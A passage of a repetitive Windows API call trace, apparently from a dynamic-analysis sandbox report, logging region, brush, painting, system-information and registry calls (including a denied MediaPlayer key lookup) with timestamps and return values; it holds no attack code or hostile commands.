CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040930 [0087.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040931 [0087.652] CombineRgn (hrgnDst=0x1040930, hrgnSrc1=0x110401d6, hrgnSrc2=0x130401d3, iMode=1) returned 1 [0087.652] CombineRgn (hrgnDst=0x1040931, hrgnSrc1=0x110401d6, hrgnSrc2=0x130401d3, iMode=4) returned 2 [0087.653] CreateSolidBrush (color=0xff) returned 0x210092f [0087.653] CreateSolidBrush (color=0xff0000) returned 0x1100932 [0087.653] DeleteObject (ho=0x1100932) returned 1 [0087.653] DeleteObject (ho=0x130401d3) returned 1 [0087.653] DeleteObject (ho=0x110401d6) returned 1 [0087.653] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.653] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.653] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.653] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.653] BeginPath (hdc=0x0) returned 0 [0087.653] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.653] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.653] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.653] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.653] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.653] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401d3 [0087.653] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401d6 [0087.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040933 [0087.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040934 [0087.653] CombineRgn (hrgnDst=0x1040933, hrgnSrc1=0x140401d3, hrgnSrc2=0x120401d6, iMode=1) returned 1 [0087.653] CombineRgn (hrgnDst=0x1040934, hrgnSrc1=0x140401d3, hrgnSrc2=0x120401d6, iMode=4) returned 2 [0087.653] CreateSolidBrush (color=0xff) returned 0x2100932 [0087.653] CreateSolidBrush (color=0xff0000) returned 0x1100935 [0087.653] DeleteObject (ho=0x1100935) returned 1 [0087.653] DeleteObject (ho=0x120401d6) returned 1 [0087.653] DeleteObject (ho=0x140401d3) returned 1 [0087.653] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.653] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.653] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.653] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.654] BeginPath (hdc=0x0) returned 0 [0087.654] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.654] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.654] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.654] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.654] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401d6 [0087.654] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401d3 [0087.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040936 [0087.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040937 [0087.654] CombineRgn (hrgnDst=0x1040936, hrgnSrc1=0x130401d6, hrgnSrc2=0x150401d3, iMode=1) returned 1 [0087.654] CombineRgn (hrgnDst=0x1040937, hrgnSrc1=0x130401d6, hrgnSrc2=0x150401d3, iMode=4) returned 2 [0087.654] CreateSolidBrush (color=0xff) returned 0x2100935 [0087.654] CreateSolidBrush (color=0xff0000) returned 0x1100938 [0087.654] DeleteObject (ho=0x1100938) returned 1 [0087.654] DeleteObject (ho=0x150401d3) returned 1 [0087.654] DeleteObject (ho=0x130401d6) returned 1 [0087.654] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.654] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.654] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.654] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.654] BeginPath (hdc=0x0) returned 0 [0087.654] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.654] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.654] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.654] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.654] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401d3 [0087.654] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401d6 [0087.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040939 [0087.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093a [0087.655] CombineRgn (hrgnDst=0x1040939, hrgnSrc1=0x160401d3, hrgnSrc2=0x140401d6, iMode=1) returned 1 [0087.655] CombineRgn (hrgnDst=0x104093a, hrgnSrc1=0x160401d3, hrgnSrc2=0x140401d6, iMode=4) returned 2 [0087.655] CreateSolidBrush (color=0xff) returned 0x2100938 [0087.655] CreateSolidBrush (color=0xff0000) returned 0x110093b [0087.655] DeleteObject (ho=0x110093b) returned 1 [0087.655] DeleteObject (ho=0x140401d6) returned 1 [0087.655] DeleteObject (ho=0x160401d3) returned 1 [0087.655] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.655] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.655] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.655] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.655] BeginPath (hdc=0x0) returned 0 [0087.655] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.655] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.655] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.655] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.655] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401d6 [0087.655] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401d3 [0087.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093c [0087.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093d [0087.655] CombineRgn (hrgnDst=0x104093c, hrgnSrc1=0x150401d6, hrgnSrc2=0x170401d3, iMode=1) returned 1 [0087.655] CombineRgn (hrgnDst=0x104093d, hrgnSrc1=0x150401d6, hrgnSrc2=0x170401d3, iMode=4) returned 2 [0087.655] CreateSolidBrush (color=0xff) returned 0x210093b [0087.655] CreateSolidBrush (color=0xff0000) returned 0x110093e [0087.655] DeleteObject (ho=0x110093e) returned 1 [0087.655] DeleteObject (ho=0x170401d3) returned 1 [0087.655] DeleteObject (ho=0x150401d6) returned 1 [0087.655] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.655] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.655] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.655] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.655] BeginPath (hdc=0x0) returned 0 [0087.655] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.655] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.655] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.656] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.656] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401d3 [0087.656] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401d6 [0087.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093f [0087.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040940 [0087.656] CombineRgn (hrgnDst=0x104093f, hrgnSrc1=0x180401d3, hrgnSrc2=0x160401d6, iMode=1) returned 1 [0087.656] CombineRgn (hrgnDst=0x1040940, hrgnSrc1=0x180401d3, hrgnSrc2=0x160401d6, iMode=4) returned 2 [0087.656] CreateSolidBrush (color=0xff) returned 0x210093e [0087.656] CreateSolidBrush (color=0xff0000) returned 0x1100941 [0087.656] DeleteObject (ho=0x1100941) returned 1 [0087.656] DeleteObject (ho=0x160401d6) returned 1 [0087.656] DeleteObject (ho=0x180401d3) returned 1 [0087.656] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.656] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.656] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.656] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.656] BeginPath (hdc=0x0) returned 0 [0087.656] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.656] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.656] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.656] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.656] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401d6 [0087.656] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401d3 [0087.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040942 [0087.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040943 [0087.656] CombineRgn (hrgnDst=0x1040942, hrgnSrc1=0x170401d6, hrgnSrc2=0x190401d3, iMode=1) returned 1 [0087.656] CombineRgn (hrgnDst=0x1040943, hrgnSrc1=0x170401d6, hrgnSrc2=0x190401d3, iMode=4) returned 2 [0087.656] CreateSolidBrush (color=0xff) returned 0x2100941 [0087.656] CreateSolidBrush (color=0xff0000) returned 0x1100944 [0087.656] DeleteObject (ho=0x1100944) returned 1 [0087.656] DeleteObject (ho=0x190401d3) returned 1 [0087.656] DeleteObject (ho=0x170401d6) returned 1 [0087.657] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.657] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.657] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.657] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.657] BeginPath (hdc=0x0) returned 0 [0087.657] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.657] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.657] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.657] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.657] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401d3 [0087.657] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401d6 [0087.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040945 [0087.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040946 [0087.657] CombineRgn (hrgnDst=0x1040945, hrgnSrc1=0x1a0401d3, hrgnSrc2=0x180401d6, iMode=1) returned 1 [0087.657] CombineRgn (hrgnDst=0x1040946, hrgnSrc1=0x1a0401d3, hrgnSrc2=0x180401d6, iMode=4) returned 2 [0087.657] CreateSolidBrush (color=0xff) returned 0x2100944 [0087.657] CreateSolidBrush (color=0xff0000) returned 0x1100947 [0087.657] DeleteObject (ho=0x1100947) returned 1 [0087.657] DeleteObject (ho=0x180401d6) returned 1 [0087.657] DeleteObject (ho=0x1a0401d3) returned 1 [0087.657] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.657] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.657] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.657] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.657] BeginPath (hdc=0x0) returned 0 [0087.657] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.657] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.657] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.657] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.658] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401d6 [0087.658] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401d3 [0087.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040948 [0087.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040949 [0087.658] CombineRgn (hrgnDst=0x1040948, hrgnSrc1=0x190401d6, hrgnSrc2=0x1b0401d3, iMode=1) returned 1 [0087.658] CombineRgn (hrgnDst=0x1040949, hrgnSrc1=0x190401d6, hrgnSrc2=0x1b0401d3, iMode=4) returned 2 [0087.658] CreateSolidBrush (color=0xff) returned 0x2100947 [0087.658] CreateSolidBrush (color=0xff0000) returned 0x110094a [0087.658] DeleteObject (ho=0x110094a) returned 1 [0087.658] DeleteObject (ho=0x1b0401d3) returned 1 [0087.658] DeleteObject (ho=0x190401d6) returned 1 [0087.658] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.658] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.658] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.658] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.658] BeginPath (hdc=0x0) returned 0 [0087.658] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.658] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.658] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.658] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.658] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401d3 [0087.658] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401d6 [0087.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094b [0087.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094c [0087.658] CombineRgn (hrgnDst=0x104094b, hrgnSrc1=0x1c0401d3, hrgnSrc2=0x1a0401d6, iMode=1) returned 1 [0087.658] CombineRgn (hrgnDst=0x104094c, hrgnSrc1=0x1c0401d3, hrgnSrc2=0x1a0401d6, iMode=4) returned 2 [0087.658] CreateSolidBrush (color=0xff) returned 0x210094a [0087.658] CreateSolidBrush (color=0xff0000) returned 0x110094d [0087.658] DeleteObject (ho=0x110094d) returned 1 [0087.658] DeleteObject (ho=0x1a0401d6) returned 1 [0087.658] DeleteObject (ho=0x1c0401d3) returned 1 [0087.658] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.658] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, 